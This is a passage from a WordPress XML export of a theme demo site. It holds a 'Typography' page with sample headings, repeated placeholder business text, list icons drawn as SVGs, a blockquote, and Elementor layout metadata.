:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Typography</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/typography/</link>
		<pubDate>Mon, 07 Sep 2020 04:22:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=471</guid>
		<description></description>
		<content:encoded><![CDATA[<h1>Heading 1</h1>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h2>Heading 2</h2>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h3>Heading 3</h3>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>Heading 4</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h5>Heading 5</h5>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h6>Heading 6</h6>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>IV Columns</h4>		
		<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p>		
			<h4>III Columns</h4>		
		<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p><p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p><p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p>		
			<h4>II Columns</h4>		
		<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.</p><p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.</p>		
			<h4>Text Elements</h4>		
		<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what’s likely to happen to demand over the next several years. Think, for example, of personal computer monitors or other types of goods that were declining pre-pandemic and fall into the “short-term spike, long-term decline” archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick</em>.</p>		
			<h4>Highlights</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p><p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>Dropcaps</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.</p><p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.</p>		
			<h4>Listings</h4>		
		<ol><li>Customer Experience</li><li>New Business Innovation</li><li>Sales and Marketing</li></ol><ul><li>Customer Experience</li><li>New Business Innovation</li><li>Sales and Marketing</li></ul>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Customer Experience
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										New Business Innovation
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Sales and Marketing
									</li>
						</ul>
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Customer Experience
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										New Business Innovation
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Sales and Marketing
									</li>
						</ul>
			<h4>Blockquote</h4>		
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>471</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 04:22:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 04:22:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[typography]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[473]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8a5d04c","elType":"section","settings":{"padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"dc1cfdf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3925b8d","elType":"widget","settings":{"title":"Heading 1","header_size":"h1","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9cdb2cf","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7594742","elType":"widget","settings":{"title":"Heading 2","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f04e2d","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"552d935","elType":"widget","settings":{"title":"Heading 3","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"eb0c1c1","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a7b273","elType":"widget","settings":{"title":"Heading 4","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3cce58e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3d16c16","elType":"widget","settings":{"title":"Heading 5","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1782a00","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"22515c1","elType":"widget","settings":{"title":"Heading 6","header_size":"h6","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"aa2835e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0e2eb3b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4555825","elType":"widget","settings":{"title":"IV Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e1bd3b8","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7359c5a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"f199e08","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6eacc12","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"bc73054","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2b7bef0","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"8e362cb","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"9b85fb3","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"52ae6c7","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"aedecf5","elType":"widget","settings":{"title":"III Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0aaf919","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"c3e0f34","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"67b4e55","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b8d273a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8de19bc","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"097ada7","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34bf2f6","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"a92b63b","elType":"widget","settings":{"title":"II Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a598d52","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"40c0145","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"50ffc56","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"69df804","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"415941f","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"010c8ae","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"093badb","elType":"widget","settings":{"title":"Text Elements","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"127fad1","elType":"widget","settings":{"editor":"<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what\u2019s likely to <span style=\"color: #52c5b6;\">happen to demand over the next several years.<\/span> Think, for example, of <span style=\"color: #52c5b6; font-weight: 600;\">personal computer monitors or other types<\/span> of goods that were declining pre-pandemic and fall into the \u201cshort-term spike, long-term decline\u201d archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick<\/em>.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ad421e7","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4ca1f31","elType":"widget","settings":{"title":"Highlights","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5249e8e","elType":"widget","settings":{"editor":"<p><span style=\"background: #52c5b6; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"c9dd334","elType":"widget","settings":{"editor":"<p><span style=\"background: #262832; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ff8b1b8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"006991d","elType":"widget","settings":{"title":"Dropcaps","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e9b8646","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e41f15a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"82d3b4a","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\" style=\"background: #52c5b6;\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"ab0df6a","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"336d7e3","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of 